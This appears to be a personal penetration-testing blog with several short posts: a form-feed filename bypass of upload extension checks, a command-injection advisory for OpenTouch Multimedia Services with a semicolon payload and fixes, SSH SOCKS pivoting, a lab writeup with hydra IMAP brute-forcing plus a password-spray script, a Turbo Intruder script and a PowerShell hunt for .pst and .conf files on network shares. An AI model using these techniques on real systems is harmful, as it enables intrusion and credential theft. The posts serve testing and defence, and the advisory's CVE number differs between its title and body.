Friday, 3 July 2020

Form Feed U+000C

A character that sometimes lets you get past a file-extension check in web apps: • (U+000C, FORM FEED). In the request below, • marks the position of the raw 0x0C byte inside the filename; the extension check saw ".pdf" and the upload went through.
// http://www.fileformat.info/info/unicode/char/000C/index.htm

POST /api/image_upload HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91652467232091688581205088441
Content-Length: 631
Connection: close

Content-Disposition: form-data; name="file"; filename=".svg•.pdf"
Content-Type: application/pdf


HTTP/1.1 200 OK
Date: Fri, 03 Jul 2020 08:09:26 GMT
Server: Apache/2
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding,User-Agent
Content-Length: 21
Content-Type: text/html
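
The post does not show the server-side code, so the exact mechanism behind the 200 OK is an assumption. The example below is added here and is not code from the original post or from the affected application: it models the common pattern of validating the extension on the raw filename and then "cleaning" the name with a whitespace-based tokenizer before saving. Because `\s` in Python (and in PCRE and Java) matches U+000C, `.svg<FF>.pdf` passes the `.pdf` check and is stored as `.svg`. The hardened variant rejects control characters before validating and saves exactly the name it validated. The function names, the allow-list and the boundary string are illustrative; `multipart_body` reproduces the shape of the captured request with the raw byte in the filename.

```python
import os
import re

# Illustrative allow-list; the real app's list is not shown on the page.
ALLOWED = {".pdf", ".png", ".jpg"}

# Assumed weak sanitizer: splits on "whitespace". In Python, PCRE and Java the
# \s class contains U+000C (form feed), not only space, tab and newline.
_WS_SPLIT = re.compile(r"\s+")


def extension_ok(name: str) -> bool:
    """Extension check on whatever string it is given."""
    return os.path.splitext(name)[1].lower() in ALLOWED


def vulnerable_stored_name(upload_name: str) -> str:
    """Assumed vulnerable flow: validate the raw name, then keep only the first
    whitespace-delimited token when saving. Validation and storage disagree."""
    if not extension_ok(upload_name):
        raise ValueError("extension not allowed")
    return _WS_SPLIT.split(upload_name)[0]  # ".svg\x0c.pdf" -> ".svg"


def hardened_stored_name(upload_name: str) -> str:
    """Reject control characters first, strip any path, validate, and store the
    validated string unchanged (no transformation after the check)."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in upload_name):
        raise ValueError("control character in filename")
    base = os.path.basename(upload_name.replace("\\", "/"))
    if not extension_ok(base):
        raise ValueError("extension not allowed")
    return base


def multipart_body(field: str, filename: str, content_type: str, data: bytes,
                   boundary: str = "----ff-demo-boundary") -> bytes:
    """Build a multipart/form-data body like the captured request. The filename
    is written raw (latin-1), so the 0x0C byte reaches the server unchanged."""
    header = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode("latin-1")
    return header + data + f"\r\n--{boundary}--\r\n".encode("latin-1")


if __name__ == "__main__":
    payload_name = ".svg\x0c.pdf"          # constructed, mirrors the capture
    print("vulnerable stores as:", repr(vulnerable_stored_name(payload_name)))
    try:
        hardened_stored_name(payload_name)
    except ValueError as exc:
        print("hardened rejects:", exc)
    print(multipart_body("file", payload_name, "application/pdf", b"<svg/>"))
```

When testing a target for this class of bug, compare the filename the app echoes back (or the stored object's name) with the one you sent; a name that lost the part after the control character tells you validation and storage looked at different strings.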


Tuesday, 5 May 2020

Alcatel-Lucent Security Advisory: CVE-2020-1179 (RCE)

OTMS remote code execution

I have discovered a vulnerability in OpenTouch Multimedia Services that makes it possible for an attacker with administration rights to execute code on the server, with high privileges, via web requests.

Description of the vulnerability

The CGI script vmconstruct.cgi is vulnerable to shell command injection through an HTTP POST request. An attacker holding an OT administrator cookie can inject arbitrary OS commands by using the semicolon (;) character in the web request.


OS command injection of this kind gives the attacker elevated shell access on the OT server.

Reference: CVE-2020-11794
Date: April 15th, 2020
Risk: High
Impact: Get access
Attack expertise: Skilled, Administrative user
Attack requirements: Remote
CVSS score: 8.0 (HIGH)
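
The advisory does not show the source of vmconstruct.cgi, so the example below is an added reconstruction of the general pattern, not Alcatel-Lucent's code: a request parameter interpolated into a command line that `/bin/sh` parses, where `;` terminates the intended command and starts the attacker's. `echo` stands in for the real provisioning tool and `vm_name` for whatever POST field the script reads; both are hypothetical. The two other functions show the fix: pass the parameter as one argv element (no shell), and validate it against an allow-list.

```python
import re
import subprocess

# Hypothetical allow-list for the one parameter the script needs.
VM_NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

# Characters worth grepping POST parameters for when hunting this bug class.
SHELL_META = set(";|&`$()<>\n")


def shell_metachars(value: str) -> list:
    """Sorted list of shell metacharacters present in a parameter value."""
    return sorted(c for c in set(value) if c in SHELL_META)


def vulnerable_construct(vm_name: str) -> str:
    """Assumed vulnerable pattern: the parameter is pasted into a command string
    that a shell parses, so ';' ends the command and starts another one."""
    cmd = f"echo constructing {vm_name}"
    proc = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True, check=False)
    return proc.stdout


def argv_construct(vm_name: str) -> str:
    """No shell involved: the parameter is a single argv element, so ';' is just
    a byte inside a name and nothing else gets executed."""
    proc = subprocess.run(["echo", "constructing", vm_name], capture_output=True, text=True, check=False)
    return proc.stdout


def hardened_construct(vm_name: str) -> str:
    """argv form plus an allow-list, so bad input is rejected instead of echoed."""
    if not VM_NAME_RE.fullmatch(vm_name):
        raise ValueError(f"rejected vm name: {vm_name!r}")
    return argv_construct(vm_name)


if __name__ == "__main__":
    payload = "vm1; echo INJECTED"          # constructed POST parameter value
    print("metachars:", shell_metachars(payload))
    print("vulnerable:", repr(vulnerable_construct(payload)))
    print("argv only:", repr(argv_construct(payload)))
    try:
        hardened_construct(payload)
    except ValueError as exc:
        print("hardened:", exc)
```

Note that the argv form alone already defeats the `;` injection; the allow-list is there so that the value cannot be abused by the tool itself (an argument starting with `-`, for instance).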

Thursday, 26 March 2020

SSH SOCKS proxy between Lan1 and Lan2

Both LANs can reach the VPS (sshd on port 8080) but not each other. The host in Lan1 publishes its own sshd on the VPS loopback, the host in Lan2 pulls that port down to its own loopback, and then opens a SOCKS proxy through the Lan1 host:

Linux in Lan1: ssh -R 5555:localhost:22 w4cky@VPS_IP -p 8080
Linux in Lan2: ssh -L 5000:localhost:5555 w4cky@VPS_IP -p 8080
Linux in Lan2: ssh -D 1234 root@localhost -p 5000

After the third command, anything pointed at the SOCKS5 proxy 127.0.0.1:1234 on the Lan2 host leaves the network from the Lan1 host. The -R listener binds only to the VPS loopback unless GatewayPorts is enabled on the VPS, which is why the -L hop in the second command is needed.

Sunday, 22 March 2020

Lab Pentestit 14 - writeup

  1. Crack password for mail
# cat logins_mail.txt                                                                                                                        

hydra -L logins_mail.txt  -P /tmp/1 imap:// -t 60 -f  -I                                                                             
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://


[143][imap] host:   login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12

telnet imap                                                         
Connected to
Escape character is '^]'.
a1 LOGIN support@test.lab PASSWORD
a1 OK
telnet> quit
Connection closed.
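
The hydra run and the telnet check above, as an added Python example that is not part of the writeup. The lab host is not reachable from here, so the block brings up a constructed in-process IMAP stub that answers CAPABILITY, LOGIN and LOGOUT, and then runs the same logic hydra applies: try each credential, stop at the first success (hydra's -f). The credential store, the user list and the wrong passwords are made up; `support@test.lab` / `PASSWORD` are the placeholders from the writeup.

```python
import imaplib
import socket
import threading

# Constructed credential store for the stub server (not the real lab target).
FAKE_VALID_CREDS = {"support@test.lab": "PASSWORD"}


def _handle_client(conn: socket.socket, valid: dict) -> None:
    """Minimal IMAP4rev1 stub: greeting, CAPABILITY, LOGIN, LOGOUT."""
    rfile = conn.makefile("rb")
    conn.sendall(b"* OK fake IMAP ready\r\n")
    while True:
        line = rfile.readline()
        if not line:
            return
        parts = line.decode("utf-8", "replace").rstrip("\r\n").split(" ", 2)
        tag = parts[0]
        cmd = parts[1].upper() if len(parts) > 1 else ""
        args = parts[2] if len(parts) > 2 else ""
        if cmd == "CAPABILITY":
            conn.sendall(b"* CAPABILITY IMAP4rev1\r\n" + f"{tag} OK done\r\n".encode())
        elif cmd == "LOGIN":
            # imaplib sends: <tag> LOGIN user "password"
            user, _, password = args.partition(" ")
            ok = valid.get(user.strip('"')) == password.strip('"')
            conn.sendall(f"{tag} {'OK' if ok else 'NO'} LOGIN\r\n".encode())
        elif cmd == "LOGOUT":
            conn.sendall(b"* BYE\r\n" + f"{tag} OK done\r\n".encode())
            return
        else:
            conn.sendall(f"{tag} BAD unsupported\r\n".encode())


def start_fake_imap_server(valid: dict = FAKE_VALID_CREDS) -> tuple:
    """Bind the stub to an ephemeral loopback port; returns (host, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve_forever():
        while True:
            conn, _ = srv.accept()
            try:
                with conn:
                    _handle_client(conn, valid)
            except OSError:
                pass

    threading.Thread(target=serve_forever, daemon=True).start()
    return srv.getsockname()


def try_imap_login(host: str, port: int, user: str, password: str) -> bool:
    """One 'a1 LOGIN user pass' attempt, as in the telnet check."""
    try:
        client = imaplib.IMAP4(host, port)
    except (OSError, imaplib.IMAP4.error):
        return False
    try:
        client.login(user, password)
        return True
    except imaplib.IMAP4.error:
        return False
    finally:
        try:
            client.logout()
        except (imaplib.IMAP4.error, OSError):
            pass


def spray(host: str, port: int, users: list, passwords: list, stop_on_first: bool = True) -> list:
    """Password-spray order: one password across all users before the next
    password, which is gentler on lockout policies than hydra's default order."""
    hits = []
    for password in passwords:
        for user in users:
            if try_imap_login(host, port, user, password):
                hits.append((user, password))
                if stop_on_first:
                    return hits
    return hits


if __name__ == "__main__":
    host, port = start_fake_imap_server()
    print(spray(host, port, ["admin@test.lab", "support@test.lab"], ["Winter2020", "PASSWORD"]))
```

Against a real server, pay attention to the NO versus BAD distinction and to throttling: a server that answers NO for a wrong password but drops the connection after a few tries is telling you about its lockout policy before the account is locked.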

HackTheBox - Sauna - WriteUP

My log from the attack on the Sauna machine on HackTheBox.
The beginning took a long time. All the fun is in enumeration. Start by enumerating employee accounts; the website turns out to be useful.

Monday, 27 January 2020

Turbo intruder sample code

# Turbo Intruder (Burp extension) script: the extension supplies RequestEngine,
# target and table, so this runs inside Turbo Intruder, not as a stand-alone script.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=False)

    # Queue 1000 copies of the marked request, substituting the %s marker with 0..999
    for i in range(1000):
        engine.queue(target.req, str(i))


def handleResponse(req, interesting):
    # Keep only responses whose body contains the marker string "cos"
    if "cos" in req.response:
        table.add(req)

Tuesday, 21 January 2020

Searching network shares for files you can read - PowerShell


# Lists the shares of $REMOTE_HOST with 'net view' and recursively searches each one
# for the given file patterns. The regex matches the "Dysk" column of a Polish
# 'net view'; on an English system that column reads "Disk", so both are accepted.
$REMOTE_HOST = "fileserver01"       # target host name (placeholder, set before running)
$FILE_TYPES = "*.pst", "*.conf"     # -Include expects an array of patterns, not one string

net view \\$REMOTE_HOST\ |
ForEach-Object {
    $path = [regex]::match($_, '(.*)\s+(Dysk|Disk)').Groups[1].Value.Trim()

    if ($path -ne "") {
        Write-Host ("### PATH: " + $path)
        Get-ChildItem -Path "\\$REMOTE_HOST\$path" -Include $FILE_TYPES -Recurse -ErrorAction Ignore |
        ForEach-Object {
            Try {
                Write-Host $_.FullName
            }
            Catch {
                #Write-Host ("Niet: " + $_.FullName)
            }
        }
    }
}

Author: hagier

Monday, 25 November 2019

XSS in practice - de-anonymisation

I came across an interesting article showing, in practice, how an effective XSS attack is carried out. The article demonstrates several interesting techniques (for example, stealing data from auto-filled forms). Taken together, it shows how an ordinary XSS de-anonymised the administrator of a certain website.

LINK: https://m417z.com/The-De-anonymization-of-the-Technion-Confessions-Admin/